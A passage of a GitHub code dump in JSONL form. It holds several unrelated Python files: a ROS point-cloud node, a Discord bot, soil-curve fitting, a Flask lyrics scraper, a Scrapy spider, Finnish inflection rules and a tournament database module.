np.where(np.abs(e)>tolerance, deltaC, 0*deltaC)*learning_rate\n deltaC_simple_filtered = np.squeeze(deltaC_filtered, axis=-1)\n self.Ro = Ro + deltaC_simple_filtered[...,0]\n self.n = n + deltaC_simple_filtered[...,1]\n self.n = np.clip(self.n, a_min=0, a_max=None)\n self.new_param = True'''\n\n # Filter parameters to help generalize -> doesn't help...\n '''k = 7 # arbitrary values from article\n kernel_size = (k,k)\n self.Ro = cv2.blur(self.Ro, kernel_size, cv2.BORDER_REPLICATE)\n self.n = cv2.blur(self.n, kernel_size, cv2.BORDER_REPLICATE)\n self.new_param = True'''\n\n rospy.loginfo(\"Algo proper:\")\n t.stop()\n\n # IMAGE PROCESSING -------------------------------------------------------------------------------------------------------------\n t.start()\n\n # Identify the used part of the image\n self.image_algoA = cv2.rectangle(self.image_takeA, (self.border_size_x_takeA, self.border_size_y_takeA), (self.img_dim_x-self.border_size_x_takeA, self.img_dim_y-self.border_size_y_takeA), (0,0,255), 3) \n self.image_algoB = cv2.rectangle(self.image_takeB, (self.border_size_x_takeB, self.border_size_y_takeB), (self.img_dim_x-self.border_size_x_takeB, self.img_dim_y-self.border_size_y_takeB), (0,0,255), 3) \n\n # Display segmentation results\n #self.image_segmented = np.where((self.Ro>=9.5) & (self.n<1.25), 255, 0).astype(self.image_algoA.dtype)\n self.image_segmented = ((self.n - 1) * 65535).astype(self.image_algoA.dtype)\n\n rospy.loginfo(\"Image:\")\n t.stop()\n\n # TEXTOVERLAY ----------------------------------------------------------------------------------------------------------------\n thetaA_deg = np.rad2deg(thetaA)\n thetaB_deg = np.rad2deg(thetaB)\n self.overlay_msg.text = \"TakeA:\\n\"\n self.overlay_msg.text += \"General angle: {0}\\n\" .format(np.rad2deg(Gplane_thetaA))\n self.overlay_msg.text += \"Specific moy: {0}\\n\" .format(np.mean(thetaA_deg))\n self.overlay_msg.text += \"Specific deviation: {0}\\n\\n\" .format(np.std(thetaA_deg))\n self.overlay_msg.text += \"TakeB:\\n\"\n self.overlay_msg.text += \"General: {0}\\n\" .format(np.rad2deg(Gplane_thetaB))\n self.overlay_msg.text += \"Specific moy: {0}\\n\" .format(np.mean(thetaB_deg))\n self.overlay_msg.text += \"Specific deviation: {0}\\n\" .format(np.std(thetaB_deg))\n self.overlay_msg.text += \"debug---------\\n\"\n self.overlay_msg.text += \"General delta: {0}\\n\" .format(np.rad2deg(Gplane_delta_theta))\n\n self.overlay_msg.text += \"--------------------------------------\\n\"\n\n # PUBLISHER ------------------------------------------------------------------------------------------------------------------\n ros_msg_pc_takeA = self.nppc_to_rospc(scaled_pcA_full, self.dtype_takeA, self.header_takeA)\n ros_msg_pc_takeB = self.nppc_to_rospc(scaled_pcB_full, self.dtype_takeB, self.header_takeB)\n ros_msg_pc_takeB_inprogress = self.nppc_to_rospc(scaled_pcB_warp_inprogress, self.dtype_takeB, self.header_takeB)\n ros_msg_pc_takeB_warpped = self.nppc_to_rospc(scaled_pcB_warp_full, self.dtype_takeB, self.header_takeB)\n try:\n self.image_pub_textureA.publish(self.bridge.cv2_to_imgmsg(self.image_algoA, \"mono16\"))\n self.image_pub_textureB.publish(self.bridge.cv2_to_imgmsg(self.image_algoB, \"mono16\"))\n self.image_pub_segmented.publish(self.bridge.cv2_to_imgmsg(self.image_segmented, \"mono16\"))\n self.point_cloud_pub_takeA.publish(ros_msg_pc_takeA)\n self.point_cloud_pub_takeB.publish(ros_msg_pc_takeB)\n self.point_cloud_pub_takeB_inprogress.publish(ros_msg_pc_takeB_inprogress)\n self.point_cloud_pub_takeB_warpped.publish(ros_msg_pc_takeB_warpped)\n self.points_info.publish(self.overlay_msg)\n self.point_cloud_pub_normalA.publish(normal_marker_listA)\n self.point_cloud_pub_normalB.publish(normal_marker_listB)\n self.point_cloud_pub_planeA.publish(marker_Gplane_takeA)\n self.point_cloud_pub_planeB.publish(marker_Gplane_takeB)\n except CvBridgeError as e:\n print(e)\n \n\ndef main(args):\n rospy.init_node('image_converter')\n\n if rospy.get_param(\"/sensor_used/offline\"):\n rospy.logwarn(\"Offline mode, algo will only be usable with bag values\")\n else:\n # Expecting camera, wait and retry until the camera node is present\n while not(rospy.has_param(\"/helios_camera_node/intensity_width\")) or not(rospy.has_param(\"/helios_camera_node/intensity_height\")):\n rospy.logwarn(\"Camera node not created, algo node will not start yet...\")\n time.sleep(10)\n\n ic = image_converter()\n rospy.loginfo(\"Algo node up and running!\")\n\n # Calculate algo and publish results at fixted rate -> replaces: rospy.spin()\n r = rospy.Rate(ic.wanted_rate)\n\n # Display parm graph\n plt.ion()\n animated_plot = plt.plot(ic.n.flatten(), ic.Ro.flatten(), marker='o', linestyle='none')[0]\n plt.title(\"Surface physic parameters\")\n plt.xlabel(\"n\")\n plt.ylabel(\"Ro\")\n plt.axis([1, 1.3, 0.5, 1.5])\n plt.draw()\n\n while not rospy.is_shutdown():\n r.sleep()\n\n if (ic.new_param):\n animated_plot.set_xdata(ic.n.flatten())\n animated_plot.set_ydata(ic.Ro.flatten())\n plt.draw()\n plt.pause(0.1)\n ic.new_param = False\n\n #ic.runAlgoAndPublish()\n \n # Save param and close plot\n np.save(os.path.join(ic.data_directory, \"param_Ro\"), ic.Ro)\n np.save(os.path.join(ic.data_directory, \"param_n\"), ic.n)\n\n rospy.loginfo(\"Both param array saved succesfully in {0}\" .format(ic.data_directory))\n plt.close('all')\n\nif __name__ == '__main__':\n main(sys.argv)","repo_name":"Philippe-DAmours/personnal_RCM_Modulaire","sub_path":"pa_tof/src/texture_analysis.py","file_name":"texture_analysis.py","file_ext":"py","file_size_in_byte":34085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36982572777","text":"# Filename: wtd.py\n\"\"\"\nPrints information for a given DOM (and detector [O]ID)\n\nUsage:\n wtd DET_ID_OR_OID DOM_ID\n wtd (-h | --help)\n wtd --version\n\nOptions:\n DOM_ID The actual DOM ID.\n DET_ID_OR_OID Detector ID (like 29) or OID (like D_ARCA003).\n -h --help Show this screen.\n\n\"\"\"\n\nimport km3db\n\n__author__ = \"Tamas Gal\"\n__copyright__ = \"Copyright 2018, Tamas Gal and the KM3NeT collaboration.\"\n__credits__ = []\n__license__ = \"MIT\"\n__maintainer__ = \"Tamas Gal\"\n__email__ = \"tgal@km3net.de\"\n__status__ = \"Development\"\n\nlog = km3db.logger.log\n\n\ndef main():\n from docopt import docopt\n\n args = docopt(__doc__, version=km3db.version)\n\n dom_id = int(args[\"DOM_ID\"])\n det = args[\"DET_ID_OR_OID\"]\n\n try:\n dom = km3db.CLBMap(km3db.tools.todetoid(det)).dom_ids[dom_id]\n except (TypeError, KeyError):\n log.error(\"No DOM with ID '{}' found in detector '{}'\".format(dom_id, det))\n exit(1)\n else:\n for param, value in zip(dom._fields, dom):\n print(\"{}={}\".format(param, value))\n","repo_name":"tamasgal/km3db","sub_path":"km3db/cli/wtd.py","file_name":"wtd.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4848234","text":"# bot.py\n\nimport os\nimport random\nimport discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\n\ndescription = '''Bot Discord réalisé par Alexis.R.\\n Chaque commande doit être utilisée avec le préfixe \"!\" pour fonctionner.'''\n\nintents = discord.Intents.default()\nintents.reactions = True\nintents.members = True\nbot = commands.Bot(command_prefix='!', description=description, intents = intents)\n\n# Évènements \n\n@bot.event\nasync def on_ready():\n for guild in bot.guilds:\n print(f'Connexion réussie ! \\n{bot.user} est connecté sur le serveur {guild.name} (ID : {guild.id})\\n')\n\n channel = bot.get_channel(850484147965394964) # Affiche un message de confirmation dans le salon textuel \"générale\"\n await channel.send('Connexion au serveur réussie !')\n\n\n@bot.event\nasync def on_member_join(member):\n RoleNew = discord.utils.get(member.guild.roles, id=851796151362387968) # Identifiant du rôle Recrue\n await member.add_roles(RoleNew)\n\n for guild in bot.guilds:\n channel = bot.get_channel(843196170620633140) # Affiche un message de confirmation dans le salon textuel \"général\"\n await channel.send(f'**Bienvenue à _{member.name}_ sur le serveur :tools: {guild.name}** !')\n\n@bot.event\nasync def on_raw_reaction_add(payload):\n msgID = 853775690112565270\n\n if msgID == payload.message_id:\n member = payload.member\n guild = member.guild\n\n emoji = payload.emoji.name\n if emoji =='⚔️':\n role = discord.utils.get(guild.roles, name=\"Chevalier\")\n elif emoji =='🛡️':\n role = discord.utils.get(guild.roles, name=\"Paladin\")\n elif emoji =='🎯':\n role = discord.utils.get(guild.roles, name=\"Archer\")\n elif emoji =='🗡️':\n role = discord.utils.get(guild.roles, name=\"Assassin\")\n await payload.member.add_roles(role)\n\n@bot.event\nasync def on_raw_reaction_remove(payload):\n msgID = 853775690112565270\n\n if msgID == payload.message_id:\n guild = await(bot.fetch_guild(payload.guild_id))\n emoji = payload.emoji.name\n if emoji =='⚔️':\n role = discord.utils.get(guild.roles, name=\"Chevalier\")\n elif emoji =='🛡️':\n role = discord.utils.get(guild.roles, name=\"Paladin\")\n elif emoji =='🎯':\n role = discord.utils.get(guild.roles, name=\"Archer\")\n elif emoji =='🗡️':\n role = discord.utils.get(guild.roles, name=\"Assassin\")\n member = await(guild.fetch_member(payload.user_id))\n if member is not None:\n await member.remove_roles(role)\n\n# Commandes utilisées sur le serveur et interprétées par le bot\n\n@bot.command(name='ping', help='| Envoie un ping au bot')\nasync def ping(ctx):\n await ctx.send(f'Pong ! {round (bot.latency * 1000)}ms')\n\ndetermine_flip = [1, 0]\n@bot.command(name='coin', help='| Simule un lancer de pièce et affiche le résultat.')\nasync def coin(ctx):\n if random.choice(determine_flip) == 1:\n embed = discord.Embed(\n title=\":coin: Pile ou face \", \n description=f\"{ctx.author.mention} a lancé une pièce et a obtenu **Pile** !\")\n await ctx.send(embed=embed)\n \n else:\n embed = discord.Embed(\n title=\":coin: Pile ou face \", \n description=f\"{ctx.author.mention} a lancé une pièce et a obtenu **Face** !\")\n await ctx.send(embed=embed)\n\n@bot.command(name='dice', help='| Simule un ou plusieurs lancers de dés')\nasync def dice(ctx, number_of_dice: int, number_of_sides: int):\n dice = [\n str(random.choice(range(1, number_of_sides + 1)))\n for _ in range(number_of_dice)\n ]\n embed = discord.Embed(\n title=\":game_die: Lancer de dés\", \n description=f\"{ctx.author.mention} a lancé les dés et a obtenu :\\n**{dice}**\")\n await ctx.send(embed=embed)\n\n@bot.command(pass_context=True)\nasync def role(ctx):\n embed = discord.Embed(\n title = \"Réagissez avec un emoji pour ajouter un rôle.\",\n description = f\":crossed_swords: Chevalier \\n :shield: Paladin \\n :dart: Archer \\n :dagger: Assassin\"\n )\n msg = await ctx.send(embed=embed)\n await msg.add_reaction('⚔️') #Chevalier\n await msg.add_reaction('🛡️') #Paladin\n await msg.add_reaction('🎯') #Archer\n await msg.add_reaction('🗡️') #Assassin\n\n@bot.command(name='encrypt', help='| Encrypte et décrypte un message ou un mot de passe')\n\nasync def encrypt(ctx):\n tableauSaisie=[]\n tableauLettre=[]\n tableauCrypto=[]\n toto=[]\n titi=[]\n tata=[]\n tab=[]\n\n def saisieTableauLettre(tab):\n \"\"\"initialisation tableau lettre\"\"\"\n for i in range (65,91):\n z=chr(i)\n tab.append(z)\n return tab\n\n #Creation du tableau de reference\n saisieTableauLettre(tableauLettre)\n\n def saisieTableauCrypto(tableauCrypto):\n \"\"\"initialisation tableau lettre crypto\"\"\"\n for i in range (66,91):\n c=chr(i)\n tableauCrypto.append(c)\n tableauCrypto.insert(25,\"A\") \n return tableauCrypto \n\n #Creation du tableau crypte\n saisieTableauCrypto(tableauCrypto)\n\n def saisieTableauSaisie(tab):\n \"\"\"saisie du tableau de depart \"\"\"\n for i in range (taille):\n x=str(input(\"Saisir la lettre à ajouter dans le tableau : \"))\n tab.append(x)\n return tab\n\n def Crypt(tab):\n \"\"\"changement de lettre Cryptage\"\"\"\n for i in range(0, taille):\n for j in range(0, 26):\n if tableauSaisie[i] == tableauLettre[j]:\n l=tableauCrypto[j]\n tab.append(l)\n j = 26\n return tab\n \n def Decrypt(tab):\n \"\"\"changement de lettre Decryptage \"\"\"\n for i in range(0, taille):\n for j in range(0, 26):\n if toto[i] == tableauCrypto[j]:\n m=tableauLettre[j]\n tab.append(m)\n j = 26\n return tab\n \n def Decrypt2(tab):\n \"\"\"changement de lettre Decryptage \"\"\"\n for i in range(0, taille):\n for j in range(0, 26):\n if tableauSaisie[i] == tableauCrypto[j]:\n m=tableauLettre[j]\n tab.append(m)\n j = 26\n return tab\n #affichage final\n\n #programme principal\n\n #nombre de lettre du mot à saisir\n await ctx.send(f'Entrez le nombre de lettres à saisir')\n taille = await bot.wait_for('message')\n #Mise en memoire du tableau saisie\n tableauSaisie = saisieTableauSaisie(tableauSaisie)\n\n Crypt=Crypt(toto)\n\n rep=str(input(\"veuillez saisir votre choix \\n C pour Crypter \\n D pour decrypter la saisie crypter \\n DD pour decrypter seulement \\n\"))\n\n if (rep=='C'):\n print(\"le message \",tableauSaisie, \"saisie devient crypté en \",Crypt)\n elif (rep=='D'):\n print(\"le message encrypté de \", Crypt, \"donne \",Decrypt(titi))\n else :\n print(\"le message \",tableauSaisie, \"saisie devient décrypté en \",Decrypt2(tata))\n\n\nbot.run(TOKEN)","repo_name":"AlexisRqs/Alex6Bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7200,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18779668271","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 15 10:40:52 2022\n\n@author: natan\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport statsmodels.api as sm\nimport scipy.optimize\n#%%\nfig_size = plt.rcParams[\"figure.figsize\"]\nfig_size[0] = 14\nfig_size[1] = 7\n\nplt.rcParams['font.size']=28\n#%%\nalldata = pd.read_csv('moflux_land_data_newLAI.csv')\npsi = np.array(alldata[\"LWP_predawn\"])\nsmc = np.array(alldata[\"SMC\"])\nno_data = np.isnan(psi)\nsmc = smc[np.logical_not(no_data)]\npsi = psi[np.logical_not(no_data)]\nyears = np.array(alldata[\"YEAR\"])[np.logical_not(no_data)]\n#%%\nyearlist = np.unique(years)\n#%%\nti = yearlist[7]\nx = smc[years==ti]\ny = psi[years==ti]\nxR = (x-0.067)/(0.55-0.067)\n#%%\ndef pot_err(params):\n s0, s1, n, alpha = params\n relsoil = np.clip((x-s0)/(s1-s0),0.01,0.99)\n m = 1 - 1/n\n predpot = -1/alpha * (relsoil ** (-1/m) - 1) ** (1/n)\n return np.mean(np.abs(predpot - y))\n#%%\nmyopt = scipy.optimize.minimize(pot_err,np.array([0.05,0.55,1.2,100]),\n bounds = ((0,0.1),(0.4,0.6),(1.05,2),(1,1000)))\n#%%\ns0, s1, n, alpha = myopt.x\n#relsoil = np.clip((x-s0)/(s1above),0.01,0.99)\nm = 1 - 1/n\n#predpot = -1/alpha * (relsoil ** (-1/m) - 1) ** (1/n)\n#%%\nsrange = np.arange(np.min(x)-0.01,np.max(x),0.005)\nrelsoil = np.clip((srange-s0)/(s1-s0),0.01,0.99)\nm = 1 - 1/n\npredpot = -1/alpha * (relsoil ** (-1/m) - 1) ** (1/n)\n\n#%%\nplt.plot(x,y,\"o\")\nplt.plot(srange,predpot)\n#%%\ndef pot_err(params):\n n, alpha = params\n m = 1 - 1/n\n predpot = -1/alpha * (xR ** (-1/m) - 1) ** (1/n)\n return np.mean(np.abs(predpot - y))\n#%%\nmyopt = scipy.optimize.minimize(pot_err,np.array([1.3,25]),\n bounds = ((1.05,2),(1,1000)))\nn, alpha = myopt.x\nm = 1 - 1/n\nsrange = np.arange(np.min(x)-0.01,np.max(x)+0.01,0.005)\nrelsoil = np.clip((srange-0.067)/(0.55-0.067),0.01,0.99)\npredpot = -1/alpha * (relsoil ** (-1/m) - 1) ** (1/n)\n#%%\nnlist = np.arange(1.1,2,0.01)\n\nbestpar = []\n\nfor ti in range(len(yearlist)):\n x = smc[years==yearlist[ti]]\n y = psi[years==yearlist[ti]]\n xR = np.clip((x-0.067)/(0.55-0.067),0.01,0.99)\n \n corlist = []\n for n in nlist:\n m = 1 - 1/n\n predpot_base = -(xR ** (-1/m) - 1) ** (1/n)\n corlist.append(np.corrcoef(predpot_base,y)[0,1])\n bestN = nlist[np.argmax(corlist)]\n n = bestN\n m = 1 - 1/n\n predpot_base = -(xR ** (-1/m) - 1) ** (1/n)\n alphaI = np.std(predpot_base)/np.std(y)\n bestpar.append([bestN,alphaI])\nbestpar = np.array(bestpar)\n#%%\nti = 6\n\nx = smc[years==yearlist[ti]]\ny = psi[years==yearlist[ti]]\nsrange = np.arange(np.min(x)-0.01,np.max(x),0.005)\nrelsoil = np.clip((srange-s0)/(s1-s0),0.01,0.99)\nxR = np.clip((x-0.067)/(0.55-0.067),0.01,0.99)\nn,alphaI = bestpar[ti]\nn = 1.3\nm = 1 - 1/n\npredpot_base = -(xR ** (-1/m) - 1) ** (1/n)\nalphaI = np.std(predpot_base)/np.std(y)\npredpot_range = -(relsoil ** (-1/m) - 1) ** (1/n)\nplt.figure()\nplt.plot(x,y,\"o\")\nplt.plot(srange,predpot_range/alphaI)\n #plt.plot([0,-2],[0,-2])","repo_name":"natan-holtzman/CliMa_Microwave","sub_path":"data/fit_soil2.py","file_name":"fit_soil2.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34142357946","text":"from flask import Flask,request,jsonify\nfrom bs4 import BeautifulSoup\nfrom app.utils.http import get_html,get_african_lyrics,get_countries\nfrom app.utils.config import AFRILYRICS_URL\nfrom logging import log\nfrom flask_cors import CORS, cross_origin\n\n\napp=Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n@cross_origin()\ndef index():\n html=get_html(AFRILYRICS_URL)\n soup=BeautifulSoup(html, 'html.parser')\n hot_row=[ i for i in soup.find(class_='item-info-overlay').findAll(class_='item') ]\n items=[]\n\n for item in hot_row:\n item_title=item.find(class_='item-title').findAll('a')[0]\n item_author=item.find(class_='item-author').findAll('a')[0]\n item_media=item.find(class_='item-media').findAll('a')[0]\n\n items.append({\n 'title':item_title.getText(),\n 'link':item_title['href'].replace('https://afrikalyrics.com',''),\n 'image':item_media['data-bg'],\n 'artist':{\n 'name':item_author.getText(),\n 'link':item_author['href'].replace('https://afrikalyrics.com','')\n }\n \n })\n\n response={}\n response['results']=items\n return jsonify(response)\n\n\n@cross_origin()\ndef artist(name):\n \"\"\" function to return artist info and songs lyrics \"\"\"\n \n return jsonify({'message':'working on this - will be available soon','url':f'/artist/{name}',})\n\n\n@cross_origin()\ndef get_country_list():\n \"\"\" get country list \"\"\"\n top_lyrics,result=get_countries()\n \n return jsonify({'result':result,'top_lyrics':top_lyrics})\n\n\n@cross_origin()\ndef get_song_lyrics(songlink):\n \"\"\" function to return song lyrics \"\"\"\n info,body=get_african_lyrics(songlink)\n\n results=[]\n\n results.append(\n {\n 'info':info,\n 'lyrics':body\n }\n )\n\n if body:\n return jsonify({'results':results})\n return jsonify({'message':'working on this - will be available soon','url':f'/artist/{songlink}',})\n\n\n\n\n\napp.add_url_rule('/','index',index)\napp.add_url_rule('/artist/','artist',artist)\napp.add_url_rule('/countries-list','country-list',get_country_list)\napp.add_url_rule('/','get-lyrics',get_song_lyrics)\n","repo_name":"itfidele/Afrikalyrics-API","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7168719197","text":"#!/usr/bin/python3\n#coding=utf-8\n\nimport json\nimport logging\nimport os\nimport decimal\n\nfrom datetime import datetime, date\n\nimport jsonschema\n\ndef json_encode_extra(obj):\n \"\"\"encoder for json.dump(s) with extra types support\"\"\"\n# return str(type(obj))\n if isinstance(obj, decimal.Decimal):\n return float(obj)\n elif isinstance(obj, datetime):\n return obj.isoformat()\n elif isinstance(obj, date):\n return obj.isoformat()\n raise TypeError(repr(obj) + \" is not JSON serializable\")\n\ndef load_json(path_json):\n \"\"\"loads json data from path, returns data or None when fails\"\"\"\n if not os.path.isfile(path_json):\n logging.exception(path_json + \" not found\")\n return None\n try:\n data = json.load(open(path_json))\n return data\n except Exception:\n logging.exception(\"Error loading \" + path_json)\n return None\n\ndef save_json(data, path_json):\n \"\"\"saves data to json file\"\"\"\n with open(path_json, 'w', encoding='utf-8') as file:\n json.dump(data, file, ensure_ascii=False)\n\ndef deep_copy_trunc(src, size_limit=1024):\n rslt = None\n if isinstance(src, dict):\n rslt = {}\n for key, val in src.items():\n rslt[key] = deep_copy_trunc(val, size_limit)\n elif isinstance(src, list):\n rslt = []\n for item in src:\n rslt.append(deep_copy_trunc(item, size_limit))\n elif isinstance(src, str):\n rslt = src if size_limit > 0 and len(src) < size_limit\\\n else src[:size_limit] + '_etc'\n else:\n rslt = src\n return rslt\n \nclass JSONvalidator:\n\n def __init__(self, schemas):\n self._schemas = schemas\n\n def validate(self, schema, data):\n try:\n jsonschema.validate(deep_copy_trunc(data), self._schemas[schema])\n return True\n except jsonschema.exceptions.ValidationError as exc:\n logging.error('Error validating json data. Schema: ' + schema)\n logging.exception(exc)\n return False\n","repo_name":"alexbzg/cfmrda-back","sub_path":"cfmrda/json_utils.py","file_name":"json_utils.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26804519304","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 12 21:21:59 2018\r\n\r\n@author: Ruby\r\n\"\"\"\r\n\r\n #'text': list.xpath('//div[@id=\"content\"]/table[2]/tr[1]/td')[0].extract()\r\n\r\nfrom __future__ import absolute_import\r\nimport scrapy\r\nimport re\r\nfrom cropView.items import CropviewItem\r\n\r\nclass CropViewSpider(scrapy.Spider):\r\n\r\n name = \"cropviewspider\"\r\n start_urls = [ \"http://ecocrop.fao.org/ecocrop/srv/en/cropView?id=289\"]\r\n custom_settings = {\r\n # specifies exported fields and order\r\n 'FEED_EXPORT_FIELDS': [\"CropID\",\"SciName\", \"Info\"],\r\n }\r\n \r\n def parse(self, response): \r\n \r\n #for list in response.css('.serviceLink'):\r\n #link = list.css('::attr(onclick)')\r\n #id = re.findall(r'\\d+', link.extract()[0])[0]\r\n \r\n #yield response.follow(\"http://ecocrop.fao.org/ecocrop/srv/en/cropView?id=\" + id, self.parse_data)\r\n yield response.follow(\"http://ecocrop.fao.org/ecocrop/srv/en/cropView?id=289\", self.parse_data) \r\n \r\n def parse_data(self, response):\r\n \r\n item = CropviewItem() \r\n \r\n DataLink = response.css('.switchView').css('::attr(href)').extract()[0]\r\n DataLink = re.findall(r'\\d+', DataLink)[0]\r\n item['CropID'] = DataLink \r\n item['SciName'] = response.xpath('//div[@id=\"content\"]/h2/text()').extract_first()\r\n item['Info'] = response.xpath('//div[@id=\"content\"]/table[2]/tr[1]/td/text()')[0].extract()\r\n yield item","repo_name":"Rubsy777/Text-Mining","sub_path":"Scrapy/cropView/cropView/spiders/cropViewSpy.py","file_name":"cropViewSpy.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31633653040","text":"from .base import *\nfrom .kotus_noun_13_katiska import kotus_noun_13_katiska\n\ndef kotus_noun_16_vanhempi(word, gradation_fn = identity):\n # suffix\n def s(text): return change_to_same_vowel_group_prefer_umlauts(word, text)\n\n word_alt = gradation_fn(word)\n\n # all words in this class end in \"a\" or \"ä\"\n (root, end_vowel) = reverse_parse(word, root_and_end_vowel)\n (root_alt, _) = reverse_parse(word_alt, root_and_end_vowel)\n v = end_vowel\n\n reference = kotus_noun_13_katiska(word, gradation_fn)\n return reference._replace(nominative_plural = root_alt + s(\"at\"),\n genitive = root_alt + s(\"an\"),\n genitives_plural = [root + s(\"ien\"),\n root + s(\"ain\")],\n partitives = [root + s(\"aa\")],\n partitives_plural = [root + s(\"ia\")],\n accusatives = [word,\n root_alt + s(\"an\")],\n accusative_plural = root_alt + s(\"at\"),\n inessive = root_alt + s(\"assa\"),\n inessives_plural = [root_alt + s(\"issa\")],\n elative = root_alt + s(\"asta\"),\n elatives_plural = [root_alt + s(\"ista\")],\n illatives = [root + s(\"aan\")],\n illatives_plural = [root + s(\"iin\")],\n adessive = root_alt + s(\"alla\"),\n adessives_plural = [root_alt + s(\"illa\")],\n ablative = root_alt + s(\"alta\"),\n ablatives_plural = [root_alt + s(\"ilta\")],\n allative = root_alt + s(\"alle\"),\n allatives_plural = [root_alt + s(\"ille\")],\n essives = [root + s(\"ana\")],\n essives_plural = [root + s(\"ina\")],\n translative = root_alt + s(\"aksi\"),\n translatives_plural = [root_alt + s(\"iksi\")],\n abessive = root_alt + s(\"atta\"),\n abessives_plural = [root_alt + s(\"itta\")],\n instructives_plural = [root_alt + s(\"in\")],\n comitatives_plural = [root + s(\"ine\")],)\n","repo_name":"sp3ctum/plover-finnish","sub_path":"stroke_dictionary_creator/stroke_dictionary_creator/inflection/roots/inflection_types/kotus_noun_16_vanhempi.py","file_name":"kotus_noun_16_vanhempi.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"29648502979","text":"def transform(legacy_data):\n\n # initialize a new dictionary to store the new data system\n new_data = {}\n\n for score in legacy_data:\n # for each letter in each score\n for letter in legacy_data[score]:\n new_data[letter.lower()] = score\n\n return new_data\n","repo_name":"PedroGF45/Exercism","sub_path":"python/etl/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73751146679","text":"#!/usr/bin/env python\n#\n# tournament.py -- implementation of a Swiss-system tournament\n#\n\nimport psycopg2\nimport bleach\n\ndef connect():\n \"\"\"Connect to the PostgreSQL database. Returns a database connection.\"\"\"\n return psycopg2.connect(\"dbname=tournament\")\n\ndef execute_query(sql_query, parameters=[]):\n \"\"\"Executes query. Useful when no records need to be fetched.\n\n Args:\n sql_query: query to execute\n parameters: (optional) list containing paramaters to pass to query. Set to\n an empty list by default.\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n cur.execute(sql_query, parameters)\n cur.close()\n conn.commit()\n conn.close()\n\n\ndef execute_query_fetchall(sql_query, parameters=[]):\n \"\"\"Executes a query, and then fetches the result of query. The results are\n then returned to the caller.\n\n Args:\n sql_query: query to execute\n parameters: (optional) list containing paramaters to pass to query. Set to\n an empty list by default.\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n cur.execute(sql_query, parameters)\n result = cur.fetchall()\n cur.close()\n conn.commit()\n conn.close()\n\n return result\n\n\ndef deleteMatches(tournament=0):\n \"\"\"Remove all the match records from the database for the specified tournament.\n\n Args:\n tournament: (optional) specifies which tournament to delete.\n Specify 0 to delete the most recent tournament.\n Specify -1 to delete all tournaments.\n Defaults to 0 if not specified.\n \"\"\"\n sql_query = \"\" # will specify query to execute\n parameters = []\n if tournament == 0:\n sql_query = \"DELETE FROM tournament_matches WHERE tournament_id = \\\n (SELECT MAX(tournament_id) FROM tournament_matches);\"\n elif tournament == -1:\n sql_query = \"DELETE FROM tournament_matches;\"\n else:\n sql_query = \"DELETE FROM tournament_matches WHERE tournament_id = %s;\"\n parameters = [bleach.clean(tournament)]\n\n execute_query(sql_query, parameters)\n\n\ndef deletePlayers(tournament=0):\n \"\"\"Remove all the player records from the database for the specified tournament.\n If a player is no longer registered for any tournaments, the player will\n also be deleted from master player table.\n\n Args:\n tournament: (optional) specifies which tournament to delete players from.\n Specify 0 to delete player data from the most recent tournament.\n Specify -1 to delete all player data in all tournaments.\n Defaults to 0 if not specified.\n \"\"\"\n sql_query = \"\" # will specify query to execute\n parameters = []\n # Delete players from tournament registry\n if tournament == 0:\n sql_query = \"DELETE FROM tournament_roster WHERE tournament_id = \\\n (SELECT MAX(tournament_id) FROM tournament_roster);\"\n elif tournament == -1:\n sql_query = \"DELETE FROM tournament_roster; DELETE FROM players;\"\n else:\n sql_query = \"DELETE FROM tournament_roster WHERE tournament_id = %s;\"\n parameters = [bleach.clean(tournament)]\n\n # Delete players from player table if they are no longer registered for any tournaments\n sql_query += \"DELETE FROM players WHERE player_id NOT IN (SELECT player_id FROM tournament_roster);\"\n\n execute_query(sql_query, parameters)\n\n\ndef countPlayers(tournament=0):\n \"\"\"Returns the number of players currently registered in the specified tournament.\n\n Args:\n tournament: (optional) specifies which tournament to count the players from.\n Specify 0 to count the players in the most recent tournament.\n Specify -1 to count all players in all tournaments. Each player is\n only counted once, regardless of number of tournaments entered.\n Defaults to 0 if not specified.\n \"\"\"\n\n sql_query = \"\" # will specify query to execute\n parameters = []\n if tournament == 0:\n sql_query = \"SELECT count(*) FROM tournament_roster WHERE tournament_id = \\\n (SELECT MAX(tournament_id) FROM tournament_roster);\"\n elif tournament == -1:\n sql_query = \"SELECT count(*) FROM players;\"\n else:\n sql_query = \"SELECT count(*) FROM tournament_roster WHERE tournament_id = %s;\"\n parameters = [bleach.clean(tournament)]\n\n return execute_query_fetchall(sql_query, parameters)[0][0]\n\ndef registerPlayer(name, tournament=0, player_id=0):\n \"\"\"Adds a player to the tournament database and assigns player to the specified\n tournament.\n\n The database assigns a unique serial 